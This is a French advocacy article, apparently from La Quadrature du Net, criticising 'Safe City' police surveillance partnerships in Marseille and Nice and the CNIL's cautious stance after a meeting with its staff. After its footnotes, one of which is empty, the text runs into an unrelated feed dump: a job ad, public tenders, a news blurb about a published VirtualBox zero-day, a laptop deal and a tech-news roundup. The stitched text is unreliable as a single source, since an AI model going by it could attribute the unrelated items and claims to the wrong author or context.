Depuis plusieurs mois, La Quadrature a commencé à se pencher sur les enjeux liés aux Smart City, alors que plusieurs villes françaises invoquent ce terme pour « déguiser » leurs projets de surveillance policière dopée aux Big Data. Il y a quelques semaines, nous rencontrions la CNIL pour discuter de ces enjeux. Résumé des épisodes précédents, et de cette rencontre pas franchement enthousiasmante.

En France, lorsqu’on évoque la police prédictive et les usages policier du Big Data, il est souvent question de l’entreprise américaine Palantir. Celle-ci agit comme une sorte de chiffon rouge : les usages policiers de ses plateformes logicielles aux États-Unis ont en effet de quoi faire froid dans le dos, et le contrat passé fin 2016 entre la firme et les services de renseignement intérieur français, la DGSI, suscite des inquiétudes légitimes. Mais à trop se focaliser sur Palantir – qui endosse à merveille le rôle de la « méchante boîte américaine » –, on risque d’oublier un peu vite qu’en France aussi, plusieurs multinationales comme Thalès, Atos Bull ou Engie se positionnent sur ces marchés sécuritaires en plein essor.

La Safe City « made in France »

Alors que le sujet était jusqu’alors largement passé sous nos radars, cela fait quelques mois que nous avons commencé à suivre ces projets, baptisés « Safe City ©» par leurs concepteurs (ou comment basculer sans rougir de la Smart City à la « ville sécurisée »).

À Marseille puis à Nice, nous avons commencé à documenter les premiers partenariats public-privé en la matière, qui pullulent actuellement sur le territoire. Au travers de ces marchés publics, on voit des multinationales françaises s'allier avec des élus municipaux peu scrupuleux pour mettre la puissance du Big Data et de l’intelligence artificielle au service de leurs polices municipales (dans les applications envisagées : analyses prédictives, repérage des comportements suspects à travers l'analyse automatique de la vidéosurveillance, surveillance des réseaux sociaux, etc). Ces partenariats soutenus par l'Union européenne ou la Banque publique d'investissement permettent à ces consortiums mêlant grands industriels, « start-ups » et instituts de recherche (comme l'INRIA) de faire financer leur recherche et développement de solutions sécuritaires par le contribuable.

L’une des choses qui frappe lorsqu’on regarde les documents relatifs à ces expérimentations, c’est la créativité dont font preuve les rédacteurs pour minimiser les enjeux en termes de libertés publiques, sans jamais vraiment réussir à convaincre. Surtout, ne pas appeler un chat un chat, et caser les mots à la mode du moment qui permettront de rassurer et de « faire moderne ©». C'est ce que relevait récemment la section locale de Ligue des droits de l’Homme à Nice :

Le marketing de la sécurité (de la peur ?), utilise volontiers quelques mots clés qui reviennent constamment en boucle : #intelligent, #temps réel ; on y rencontre aussi des #infaillible aux allures jupitériennes, destinés à clouer le bec de tout contradicteur.

Pour ce qui est de la vie privée, les rédacteurs se contentent d'une vague mention du « RGPD » ou de la « Loi informatique et libertés ». Inutile de vraiment plancher sur une analyse juridique qui démonterait que ces projets sont tout simplement illégaux...

On a rencontré la CNIL (et c’est triste)

Il y a quelques semaines, après la réponse que nous a faite la présidente de la CNIL à un courrier de janvier 2018, nous avons rencontré ses services pour en savoir plus sur la manière dont ils suivaient (ou pas) ces dossiers. Côté Quadrature, nous étions trois. En face de nous, il y avait Jean Lessi, conseiller d’État et secrétaire général de la CNIL, et trois autres personnes travaillant de loin sur ces sujets de « Safe City » au titre de leurs attributions. L'échange a été cordial. Nous avons rencontré des gens aimables, prenant au sérieux nos inquiétudes. Et pourtant, notre discussion a débouché sur un constat particulièrement amer quant à la capacité de la CNIL à être à la hauteur des enjeux.

Aucune analyse juridique détaillée

Le premier constat, c’est que la CNIL n’a en réalité pas de politique détaillée sur les Safe Cities. En 2014 déjà, elle échangeait avec le ministère de l’Intérieur sur des expérimentation locales de dispositifs statistiques à visée de police prédictive (sans même le Big Data à l’époque). L’an dernier, la CNIL publiait une étude prospective tout-à-fait lucide sur les enjeux de la Smart City pour les libertés publiques. Mais aujourd'hui, celle-ci ne dispose encore d’aucune analyse juridique qui puisse faire autorité sur la légalité des expérimentations projetées.

Comme le montrait le courrier envoyé par la présidente de la CNIL au maire de Marseille, la CNIL se borne pour l’heure à appeler au respect de garanties procédurales, avec notamment la nécessaire étude d’impact (la mairie en aurait promis une pour cet hiver...) et un « accompagnement obligatoire » à l’issue des expérimentations (prévu pour les « nouvelles technologies » par l’article 70-4 de la loi informatique et liberté modifiée).

Les analyses juridiques qui fleurissent au Conseil de l’Europe ou ailleurs1, et qui tentent de construire une réflexion pratique sur les liens entre Big Data, Intelligence Artificielle et droits de l’Homme, semblent la laisser de marbre.

Dans le silence de la loi, tout et n'importe quoi

Lorsqu’on demande à nos interlocuteurs pourquoi ils ne demandent tout simplement pas l’arrêt de ces expérimentations, comme il fut fait au printemps s’agissant de l’application Reporty à Nice (décision dont nous avons eu communication : la voici), on nous explique qu'à l'inverse de Reporty, la loi ne dit rien de spécifique sur la Safe City, et que les mairies peuvent donc faire peu ou prou ce qu'elles veulent.2.

Nous répondons que, justement, c'est parce que la loi ne dit rien non plus de l’utilisation du Big Data à des fins policières, de la surveillance des réseaux sociaux et de toutes ces choses évoquées dans les projets d’expérimentation « Safe City », que ces derniers sont clairement illégaux3. C'est justement pour cela qu'ils mériteraient l'opposition ferme et résolue de la CNIL.

Silence gêné. On en déduit, que sous couvert d'expérimentations, tout ou presque est permis. La CNIL semble ici adhérer au rapport du député Cédric Villani sur l’intelligence artificielle, qui revendiquait de s'affranchir de la loi pour expérimenter les usages de l'IA à des fins de surveillance (visant sans le nommer le partenariat Palantir-DGSI). Dans la Startuffe Nation, il te suffit de parler d'« expérimentation » et d'« innovation smart », de méthodes « lean » en lien avec « l'écosystème startup », et ça te vaut un sauf-conduit pour faire tout et n'importe quoi.

La CNIL résignée face au discours sécuritaire

Bref. On continue donc la discussion, et nos interlocuteurs de la CNIL continuent de se défiler en nous disant en substance ceci : « Même si les projets d’expérimentation font peur sur le papier, il faut bien faire la différence entre le discours marketing des projets d’expérimentation (qui surenchérit dans la dystopie orwelienne) et l’étape de la mise en œuvre (qui s’avérera décevante et bien plus limitée que ce qui est projeté au départ) ».

Alors oui, on peut être d’accord sur le fait que ces expérimentations ne tiendront pas leurs promesses dans les délais impartis. Pour autant, cette position de la CNIL qui tend à minimiser la portée de ces projets oublie deux choses. La première, c’est que les discours marketing participent déjà de la banalisation des systèmes de surveillance. Et ce d'autant plus qu'ils sont repris par les élus qui, tout en masquant les dangers de la Safe City, tentent d’en faire un atout électoral. Le marketing de la surveillance impose partout la société de surveillance, et ce devrait être le rôle de la CNIL que d'utiliser les moyens à sa disposition pour aider à déconstruire ces discours (et tant pis si cela suscite l’ire des élus locaux).

Surtout, vu le rythme auquel croît l’informatique de contrôle (Big Data, IA & co), il est clair que ces systèmes de surveillance verront le jour. À force de balancer des millions d'euros pour les financer, la technocratie nous enfoncera encore un peu plus dans la dystopie orwellienne. De fait, ces outils existent déjà en Chine et, dans une moindre mesure, aux États-Unis et au Royaume-Uni. L'un des buts de ces expérimentations n’est-il pas justement de permettre aux industriels français de rattraper au plus vite leur retard sur la concurrence étrangère ?

Un appel au débat qui ne mange pas de pain

Au fond, si la CNIL botte en touche sur ces sujets ô combien importants, c’est qu’elle accepte d'être condamnée à l'impuissance.

À l’image d’autres autorités de contrôle dévolues à la protection des libertés publiques, ses moyens financiers et humains sont structurellement dérisoires par rapport à l’ampleur de ses missions. Il faut dire que la conjoncture n’est guère favorable : la CNIL doit faire face à l’entrée en vigueur du RGPD en mai dernier, qui la met en première ligne. Nos interlocuteurs ont d'ailleurs commencé la discussion en pointant leur manque de moyens, comme pour s’excuser par avance de leur relative inaction. On nous a fait comprendre que les personnes que nous avions en face sont en réalité les seules parmi un staff d’environ 200 personnes à plancher sur ces sujets de Safe City. Et encore, seulement de loin, en plus de leurs autres missions touchant aux fichiers régaliens… Le projet de budget 2019 envisage bien une augmentation de ses ressources de +4,8 % (+ 860 000 euros), mais cela est largement insuffisant pour palier aux besoins.

Il y a une seconde explication plus générale à l’impuissance de la CNIL : celle-ci est sciemment organisée par les pouvoirs exécutifs et législatifs. L'attentisme actuel apparaît en effet comme le point d’orgue d’une tendance à l’œuvre depuis les années 1980, qui a vu les pouvoirs de la commission progressivement rognés s’agissant de la surveillance d’État. Alors que ses responsables aiment à rappeler le « mythe fondateur » du scandale SAFARI – provoqué en 1974 par le projet d’une interconnexion des fichiers informatiques de la police, des service fiscaux et sociaux –, la CNIL n’a cesse depuis de perdre du terrain sur ces questions.

Ainsi, en 1991, l’État choisit de créer une nouvelle autorité (la CNCIS) plutôt que de lui permettre de contrôler la surveillance des communications par les services de renseignement. En 2004, on lui ôte le pouvoir de s’opposer à la création de fichiers policiers, en rendant son avis sur les projets de décrets afférents purement consultatif. Enfin, depuis presque vingt ans, on met à sa tête des gens proches des hautes sphères administratives ou politiques, comme une manière de garantir sa relative docilité vis-à-vis de l’État dans des dossiers clés.

Dans ce contexte délétère, la CNIL en est réduite à appeler à un grand « débat démocratique », tout en reconnaissant les graves menaces que font peser ces systèmes pour les droits et libertés. Ce qu'elle a fait le 19 septembre dernier. On lit dans son communiqué publié ce jour-là :

Ces dispositifs, qui s’articulent parfois avec des technologies de big data, soulèvent des enjeux importants pour les droits et libertés individuelles des citoyens. Le sentiment de surveillance renforcée, l’exploitation accrue et potentiellement à grande échelle de données personnelles, pour certaines sensibles (données biométriques), la restriction de la liberté d’aller et de venir anonymement, sont autant de problématiques essentielles pour le bon fonctionnement de notre société démocratique.
Il est aujourd’hui impératif que des garde-fous soient prévus afin d’encadrer les finalités pour lesquelles ces dispositifs peuvent être déployés et prévenir tout mésusage des données traitées par leur biais (…).
Aussi, la CNIL appelle d’urgence à un débat démocratique sur cette problématique, et à ce que le législateur puis le pouvoir réglementaire se saisissent de ces questions afin que soient définis les encadrements appropriés, en recherchant le juste équilibre entre les impératifs de sécurisation, notamment des espaces publics, et la préservation des droits et libertés de chacun4.

Un appel de pure forme, qui finira sans aucun doute par être entendu par les ministères de l'intérieur et de la justice. Le gouvernement a en effet affirmé au printemps vouloir réviser la loi renseignement en 2020. Il lui faudra de toute façon bien finir par légaliser tout un tas d’usages sécuritaires de l’informatique expérimentés ces derniers temps dans la plus grande illégalité (coucou Palantir à la DGSI, coucou le fichier TES et sa myriade d'usages potentiels qu'on voudra bientôt légaliser, etc.). Au train où vont les lois sécuritaires, et vu que les marchands de peur sont récemment passés ceinture marron dans l'art de pourrir le débat sur ces questions, ils accueillent sans doute l'appel de la CNIL avec sérénité.

Au minimum, la CNIL devrait imposer un moratoire sur les expérimentations en cours : exiger leur arrêt tant qu'elles ne sont pas précisément autorisées et encadrées par la loi. Sa position attentiste la rend complice.

  • 1.

  • 2. Le raisonnement juridique de la CNIL, détaillé dans un document dont nous avons eu communication, est en gros le suivant : « Reporty s’analysait en droit comme l’extension du système de vidéosurveillance de la ville (à travers les ordiphones des gens) ; or, la vidéosurveillance fait l’objet d’un encadrement dans le code de la sécurité intérieure ; comme pour les caméras piéton des policiers, faut donc que la loi autorise expressément le recours par les collectivités aux ordiphones des gens pour surveiller la population ; or cette autorisation législative qui fait pour l’heure défaut ».
  • 3. C'est la conséquence logique de la jurisprudence de base de de CEDH en la matière : toute forme de surveillance qui ne fait pas l’objet d’une règle juridique claire et intelligible associée à des garde-fous est illégale.
  • 4. https://www.cnil.fr/fr/la-cnil-appelle-la-tenue-dun-debat-democratique-sur-les-nouveaux-usages-des-cameras-video

          Agent soutien technique, Télébec - Bell - Val-d'Or, QC      Cache   Translate Page      
Une expertise des systèmes d’exploitation Windows 7,8, et 10, Vista, MAC et Outlook. Code de demande:....
From Bell Canada - Tue, 30 Oct 2018 16:55:41 GMT - View all Val-d'Or, QC jobs
          490748-2018: France-Évreux: Mise en état d'exploitation d'installations de chauffage      Cache   Translate Page      
Date de publication: 07/11/2018 | Date limite: | Document: Avis d'attribution de marché
          Exploitation et archivage de photos geolocalisées (06-11-2018 22:07)      Cache   Translate Page      
Multimédia
          VirtualBox Zero-Day Vulnerability Details and Exploit Are Publicly Available      Cache   Translate Page      
A Russian vulnerability researcher and exploit developer has published detailed information about a zero-day vulnerability in VirtualBox. His explanations include step-by-step instructions for exploiting the bug. [...]
          490421-2018: Suède-Stockholm: Services d'exploitation d'aéroport      Cache   Translate Page      
Date de publication: 07/11/2018 | Date limite: 03-12-2018 | Document: Avis de marché
          The ongoing trade in conflict timber (commentary)      Cache   Translate Page      
November 6 is the UN’s International Day for Preventing the Exploitation of the Environment in War and Armed Conflict. A decade after a tragic war in Liberia that was largely financed by the looting of its forest, and with 2017 ranking as one of the most violent years since the end of the Cold War, […]
          Promo 699€ ! MSI GL63 8RD-640XFR, PC portable 15" Coffee Lake GTX 1050 Ti      Cache   Translate Page      
Affiché à moins de 800 euros sans système d'exploitation préinstallé (type Windows), le MSI GL63 8RD-640XFR est un nouveau PC portable gamer de 15 pouces qui met à profit une architecture solide. Sous son châssis subtilement teinté de rouge, il installe un processeur Quad Core i5 Coffee Lake, 8 Go de mémoire vive, un stockage […]
          10 things in tech you need to know today      Cache   Translate Page      

Marc Benioff Elon Musk

Good morning! This is the tech news you need to know this Wednesday.

  1. Amazon employees are gearing up to confront CEO Jeff Bezos at an all-staff meeting this week about selling facial recognition software to law enforcementEmployees are urging their colleagues to put pressure on the company at an all-staff meeting Thursday by inundating CEO Jeff Bezos with questions, Recode reports.
  2. Reddit's Alexis Ohanian says "hustle porn" is "one of the most toxic, dangerous things in tech right now" at Web Summit on Tuesday. "Hustle porn" is the fetishization of extremely long working hours, and Ohanian said he let his own mental health go when he built Reddit.
  3. Marc Benioff invited Elon Musk to dig tunnels in San Francisco for a new transportation system, and the Tesla founder accepted. The Salesforce CEO asked Musk on Twitter whether the Boring Company could come to San Francisco, and Musk replied: "Sure, we can do it."
  4. Facebook said that the 100 accounts it removed ahead of the midterm elections for "inauthentic behavior" may well be Russian. Facebook's head of cyber security policy told TechCrunch that the company blocked over 100 accounts after receiving a tip-off from law enforcement that they could be connected to the Russia-based Internet Research Agency.
  5. A federal judge ruled that chip seller Qualcomm must license some of its technology to competitors. The preliminary ruling came in an antitrust lawsuit against Qualcomm brought by the US Federal Trade Commission in early 2017.
  6. The FCC is calling for all phone carriers to implement effective caller ID by 2019. The FCC's Chairman Ajit Pai said this was important in combating "illegal robocalls."
  7. The president of Samsung says "we should really worry about ethics" as artificial intelligence moves into your DNA. Samsung Electronics president Young Sohn told Business Insider about his concerns around AI exploits health and DNA data.
  8. One of Microsoft's fastest-rising stars is leaving the company with the intention of "getting back to building new things." Javier Soltero, who came to Microsoft after his startup, Acompli, was acquired in 2014, is leaving after four years.
  9. Samsung is hinting that it will reveal its long-awaited foldable phone on November 7. Samsung's foldable phone has been nicknamed "Galaxy F" and "Galaxy X."
  10. Tinder's paying user base went up from 3.8 million last quarter to 4.1 million this quarter, and is projected to bring in $800 million in revenue this year. Tinder's parent company Match Group surpassed its forecasted revenue for Q3.

Have an Amazon Alexa device? Now you can hear 10 Things in Tech each morning. Just search for "Business Insider" in your Alexa's flash briefing settings.

Join the conversation about this story »

NOW WATCH: Here's the reason most new console video games cost $60